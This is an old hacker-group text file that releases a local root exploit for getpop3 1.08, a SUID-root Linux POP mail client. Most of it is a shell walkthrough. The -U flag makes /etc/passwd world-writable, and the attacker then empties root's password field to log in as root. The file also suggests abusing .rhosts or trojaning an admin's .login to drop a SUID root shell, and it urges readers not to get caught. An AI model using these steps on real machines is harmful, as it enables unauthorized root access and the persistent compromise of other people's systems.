getpop3.txt

`########################################  
#what?: [=-getpop3 exploit-=] #  
#who?: [- by r3p3nt of the DHC -] #  
#where?: [- http://dhc1.cjb.net -] #  
#contact?: [- [email protected] #  
########################################  
greets: all of DHC, duke, f0rpaxe, artech, and eli (up for some raceball?)  
thanks: jwb  
  
[email protected]  
  
You are wondering "hmm..what is getpop3, mister r3p3nt". Well, getpop3 is a  
POP mail client for linux (no, not that stuff in Chex mix). This exploit has  
been known by me for a very long time..so I might as well release it now.  
This exploit was found when someone (he will go unnamed because I don't want  
Joel to look like a fool) said his linux box was 'secure, no one can hack  
it'. After some fumbling around on his box...root access was obtained.  
The hole? Getpop3. Getpop3 is installed SUID root. If you dont know what   
SUID  
root is..don't use this exploit@!$ When getpop3 is fed the -U parameter it   
sets  
a file world writable. If you are a goon..here is how this could be good:  
  
lamebox:~$ id  
uid=1000(elf) gid=100(users) groups=100(users)  
lamebox:~$ cp /etc/passwd /tmp/backup  
lamebox:~$ getpop3 -V  
getpop3 1.08 Copyright 1997 Double Precision, Inc.  
  
lamebox:~$ getpop3 -U /etc/passwd  
enter userid: elf  
enter password: mypassword  
enter host:poopy.reallame666.com  
querying poopy.reallame666.com  
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready   
Fri, 1  
>USER elf  
+OK Password required for elf  
>PASS password  
+OK elf's mailbox has 0 messages (0 octets)  
>STAT  
+OK 0 0  
>QUIT  
+OK poopy.reallame666.com POP3 server closing connection  
  
*************************************************************  
Whoo hooo! Now /etc/passwd is world writable..the fun begins*  
Remember the file we backed up? *  
*************************************************************  
  
lamebox:~$ cat /tmp/backup > /etc/passwd  
  
***********************************************************************  
now edit the passwd file so you are 0:0 ...like so: *  
root:x:0:0:super admin,,,:/root:/bin/bash <-- whats in the /etc/passwd*  
root::0:0:your daddy,,,:/root/:bin/bash <-- what you change it to *  
Now log on as root!@# *  
If you didn't fuck anything up you should be dropped to a root shell, *  
and not asked for a password. *  
Don't wanna overwrite /etc/passwd? Then use .rhosts .Hell, you could *  
even edit the admins .login ...and make it so when the logs in he/she *  
tosses an SUID root shell in /tmp *  
Be creative in what you do, and don't get caught! *  
***********************************************************************  
  
*************FIX*********************************************  
* I havn't noticed the hole in the newer versions. Upgrade. *  
*************************************************************  
`